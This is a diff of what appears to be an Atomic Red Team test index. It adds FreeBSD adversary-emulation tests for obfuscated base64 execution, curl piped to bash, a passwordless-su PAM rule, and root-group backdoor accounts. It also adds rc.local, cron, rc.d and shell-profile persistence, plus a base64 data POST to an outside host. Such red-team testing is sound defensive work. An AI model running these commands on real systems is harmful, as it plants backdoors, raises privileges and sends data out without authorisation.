supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -33299,6 +34510,25 @@ execution:
|
||||
elevation_required: false
|
||||
command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
|
||||
\"$ART\" |base64 -d |/bin/bash\nunset ART \n"
|
||||
- name: Obfuscated command line scripts (freebsd)
|
||||
auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
|
||||
description: 'An adversary may pre-compute the base64 representations of the
|
||||
terminal commands that they wish to execute in an attempt to avoid or frustrate
|
||||
detection. The following commands base64 encodes the text string id, then
|
||||
base64 decodes the string, then pipes it as a command to bash, which results
|
||||
in the id command being executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
ART=$(echo -n "id" |b64encode -r -)
|
||||
echo "\$ART=$ART"
|
||||
echo -n "$ART" |b64decode -r |/bin/sh
|
||||
unset ART
|
||||
- name: Change login shell
|
||||
auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
|
||||
description: "An adversary may want to use a different login shell. The chsh
|
||||
@@ -33329,6 +34559,37 @@ execution:
|
||||
cat /etc/passwd |grep ^art
|
||||
cleanup_command: 'userdel art
|
||||
|
||||
'
|
||||
- name: Change login shell (freebsd)
|
||||
auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
|
||||
description: "An adversary may want to use a different login shell. The chsh
|
||||
command changes the user login shell. The following test, creates an art user
|
||||
with a /bin/sh shell, changes the users shell to sh, then deletes the art
|
||||
user. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'chsh - change login shell, must be installed
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
|
||||
1"; exit 1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "Automated installer not implemented yet, please
|
||||
install chsh manually"
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/csh
|
||||
cat /etc/passwd |grep ^art
|
||||
chsh -s /bin/sh art
|
||||
cat /etc/passwd |grep ^art
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Environment variable scripts
|
||||
auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51
|
||||
@@ -33348,6 +34609,25 @@ execution:
|
||||
echo $ART |/bin/bash
|
||||
cleanup_command: 'unset ART
|
||||
|
||||
'
|
||||
- name: Environment variable scripts (freebsd)
|
||||
auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
|
||||
description: 'An adversary may place scripts in an environment variable because
|
||||
they can''t or don''t wish to create script files on the host. The following
|
||||
test, in a bash shell, exports the ART variable containing an echo command,
|
||||
then pipes the variable to /bin/sh
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
export ART='echo "Atomic Red Team was here... T1059.004"'
|
||||
echo $ART |/bin/sh
|
||||
cleanup_command: 'unset ART
|
||||
|
||||
'
|
||||
- name: Detecting pipe-to-shell
|
||||
auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1
|
||||
@@ -33387,6 +34667,42 @@ execution:
|
||||
cleanup_command: 'rm /tmp/art.txt
|
||||
|
||||
'
|
||||
- name: Detecting pipe-to-shell (freebsd)
|
||||
auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
|
||||
description: 'An adversary may develop a useful utility or subvert the CI/CD
|
||||
pipe line of a legitimate utility developer, who requires or suggests installing
|
||||
their utility by piping a curl download directly into bash. Of-course this
|
||||
is a very bad idea. The adversary may also take advantage of this BLIND install
|
||||
method and selectively running extra commands in the install script for those
|
||||
who DO pipe to bash and not for those who DO NOT. This test uses curl to download
|
||||
the pipe-to-shell.sh script, the first time without piping it to bash and
|
||||
the second piping it into bash which executes the echo command.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if running on a Debian based machine.
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
|
||||
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
|
||||
get_prereq_command: 'pkg update && pkg install -y curl
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
|
||||
|bash\nls -la /tmp/art.txt \n"
|
||||
cleanup_command: "rm /tmp/art.txt \n"
|
||||
- name: Current kernel information enumeration
|
||||
auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
|
||||
description: 'An adversary may want to enumerate the kernel information to tailor
|
||||
@@ -33830,7 +35146,6 @@ execution:
|
||||
description: Download and execute shell script and write to file then execute
|
||||
locally using Python -c (command mode)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
script_url:
|
||||
@@ -33872,7 +35187,6 @@ execution:
|
||||
description: Create Python file (.py) that downloads and executes shell script
|
||||
via executor arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -33930,7 +35244,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -33995,7 +35308,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Verify if python is in the environment variable path and attempt
|
||||
@@ -34845,6 +36157,39 @@ execution:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
- name: At - Schedule a job freebsd
|
||||
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
description: 'This test submits a command to be run in the future by the `at`
|
||||
daemon.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'The `at` executable must exist in the PATH
|
||||
|
||||
'
|
||||
prereq_command: 'which at
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
|
||||
PATH (Package name: `at`)''
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
T1035:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -35613,6 +36958,36 @@ persistence:
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM rule (freebsd)
|
||||
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
|
||||
description: |
|
||||
Inserts a rule into a PAM config and then tests it.
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
type: string
|
||||
default: "/etc/pam.d/su"
|
||||
pam_rule:
|
||||
description: Rule to add to the PAM config.
|
||||
type: string
|
||||
default: auth sufficient pam_succeed_if.so uid >= 0
|
||||
index:
|
||||
description: Index where the rule is inserted.
|
||||
type: integer
|
||||
default: 8
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
|
||||
|
||||
'
|
||||
- name: Malicious PAM module
|
||||
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
|
||||
@@ -37154,9 +38529,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -37207,6 +38581,33 @@ persistence:
|
||||
rm /etc/cron.hourly/#{cron_script_name}
|
||||
rm /etc/cron.monthly/#{cron_script_name}
|
||||
rm /etc/cron.weekly/#{cron_script_name}
|
||||
- name: Cron - Add script to /etc/cron.d folder
|
||||
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
|
||||
description: 'This test adds a script to /etc/cron.d folder configured to execute
|
||||
on a schedule.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
type: string
|
||||
default: echo '*/5 * * * * root echo "Hello
|
||||
from Atomic Red Team"' > /tmp/atomic.log
|
||||
cron_script_name:
|
||||
description: Name of file to store in cron folder
|
||||
type: string
|
||||
default: persistevil
|
||||
executor:
|
||||
elevation_required: true
|
||||
name: sh
|
||||
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
cleanup_command: 'rm /etc/cron.d/#{cron_script_name}
|
||||
|
||||
'
|
||||
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
|
||||
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
|
||||
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
|
||||
@@ -38232,7 +39633,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -38250,7 +39650,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -38267,7 +39666,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -40047,6 +41445,32 @@ persistence:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap EXIT (freebsd)
|
||||
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
EXIT''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -40064,6 +41488,32 @@ persistence:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Trap SIGINT (freebsd)
|
||||
auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada
|
||||
description: |
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y bash)\n"
|
||||
executor:
|
||||
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
|
||||
SIGINT && kill -SIGINT $$''
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f /tmp/art-fish.txt
|
||||
|
||||
@@ -40348,6 +41798,27 @@ persistence:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Create a user account on a FreeBSD system
|
||||
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
|
||||
description: 'Create a user via pw
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
type: string
|
||||
default: evil_user
|
||||
executor:
|
||||
command: 'pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
|
||||
|
||||
'
|
||||
cleanup_command: 'rmuser -y #{username}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Create a new user in Linux with `root` UID and GID.
|
||||
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
|
||||
description: 'Creates a new user in Linux and adds the user to the `root` group.
|
||||
@@ -40374,6 +41845,32 @@ persistence:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Create a new user in FreeBSD with `root` GID.
|
||||
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
|
||||
description: 'Creates a new user in FreeBSD and adds the user to the `root`
|
||||
group. This technique was used by adversaries during the Butter attack campaign.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
type: string
|
||||
default: butter
|
||||
password:
|
||||
description: Password of the user to create
|
||||
type: string
|
||||
default: BetterWithButter
|
||||
executor:
|
||||
command: |
|
||||
pw useradd #{username} -g 0 -d /root -s /bin/sh
|
||||
echo "#{password}" | pw usermod #{username} -h 0
|
||||
cleanup_command: 'pw userdel #{username}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1053.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -41065,9 +42562,8 @@ persistence:
|
||||
persistence on victim host. \nIf the user is able to save the same contents
|
||||
in the authorized_keys file, it shows user can modify the file.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -44848,6 +46344,26 @@ persistence:
|
||||
head -n '-2' ~/.bashrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.bashrc
|
||||
name: sh
|
||||
- name: Add command to .shrc
|
||||
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
|
||||
description: 'Adds a command to the .shrc file of the current user
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
type: string
|
||||
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
|
||||
executor:
|
||||
command: 'echo ''#{command_to_add}'' >> ~/.shrc
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
head -n '-2' ~/.shrc > /tmp/T1546.004
|
||||
mv /tmp/T1546.004 ~/.shrc
|
||||
name: sh
|
||||
- name: Append to the system shell profile
|
||||
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
|
||||
description: 'An adversary may wish to establish persistence by executing malicious
|
||||
@@ -44855,7 +46371,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -44878,7 +46393,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -46615,6 +48129,27 @@ persistence:
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
- name: rc.local (FreeBSD)
|
||||
auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476
|
||||
description: 'Modify rc.local
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
|
||||
printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local
|
||||
echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local
|
||||
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
|
||||
sudo chmod +x /etc/rc.local
|
||||
cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
|
||||
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
|
||||
sudo rm $origfilename;fi
|
||||
|
||||
'
|
||||
T1209:
|
||||
technique:
|
||||
@@ -46932,6 +48467,45 @@ persistence:
|
||||
rm -rf #{systemd_service_path}/#{systemd_service_file}
|
||||
systemctl daemon-reload
|
||||
name: bash
|
||||
- name: Create SysV Service
|
||||
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
|
||||
description: 'This test creates a SysV service unit file and enables it as a
|
||||
service.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
type: path
|
||||
default: "/usr/local/etc/rc.d"
|
||||
rc_service_file:
|
||||
description: File name of rc service file
|
||||
type: string
|
||||
default: art-test
|
||||
executor:
|
||||
command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '#
|
||||
REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD:
|
||||
shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker'
|
||||
>> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho
|
||||
' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command
|
||||
\"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice
|
||||
art-test enable\nservice art-test start\n"
|
||||
cleanup_command: |
|
||||
sysrc -x art_test_enable
|
||||
rm -f #{rc_service_path}/#{rc_service_file}
|
||||
name: sh
|
||||
- name: Create Systemd Service file, Enable the service , Modify and Reload the
|
||||
service.
|
||||
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
|
||||
@@ -47852,6 +49426,39 @@ persistence:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
- name: At - Schedule a job freebsd
|
||||
auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
description: 'This test submits a command to be run in the future by the `at`
|
||||
daemon.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'The `at` executable must exist in the PATH
|
||||
|
||||
'
|
||||
prereq_command: 'which at
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo ''Please install `at` ; they were not found in the
|
||||
PATH (Package name: `at`)''
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'echo "#{at_command}" | at #{time_spec}'
|
||||
T1556:
|
||||
technique:
|
||||
modified: '2023-04-11T03:17:32.211Z'
|
||||
@@ -48314,6 +49921,23 @@ persistence:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
@@ -48337,6 +49961,30 @@ persistence:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
@@ -48355,6 +50003,26 @@ persistence:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
T1574.012:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -48588,6 +50256,37 @@ command-and-control:
|
||||
echo -n 111-11-1111 | base64
|
||||
curl -XPOST #{base64_data}.#{destination_url}
|
||||
name: sh
|
||||
- name: Base64 Encoded data (freebsd)
|
||||
auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298
|
||||
description: 'Utilizing a common technique for posting base64 encoded data.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
destination_url:
|
||||
description: Destination URL to post encoded data.
|
||||
type: url
|
||||
default: redcanary.com
|
||||
base64_data:
|
||||
description: Encoded data to post using fake Social Security number 111-11-1111.
|
||||
type: string
|
||||
default: MTExLTExLTExMTE=
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Requires curl
|
||||
|
||||
'
|
||||
prereq_command: "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit
|
||||
1; fi; \n"
|
||||
get_prereq_command: 'pkg install -y curl
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
echo -n 111-11-1111 | b64encode -r -
|
||||
curl -XPOST #{base64_data}.#{destination_url}
|
||||
name: sh
|
||||
T1568.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -50100,6 +51799,33 @@ command-and-control:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Tor Proxy Usage - FreeBSD
|
||||
auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
|
||||
description: "This test is designed to launch the tor proxy service, which is
|
||||
what is utilized in the background by the Tor Browser and other applications
|
||||
with add-ons in order to provide onion routing functionality.\nUpon successful
|
||||
execution, the tor proxy service will be launched. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: "Tor must be installed on the machine \n"
|
||||
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
|
||||
exit 1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: 'pkg install -y tor
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
sysrc tor_enable="YES"
|
||||
service tor start
|
||||
cleanup_command: |
|
||||
service tor stop
|
||||
sysrc -x tor_enable
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -50213,7 +51939,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -50794,7 +52519,6 @@ command-and-control:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -50883,7 +52607,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -50923,7 +52646,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -50962,7 +52684,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -50993,7 +52714,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -51024,7 +52744,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
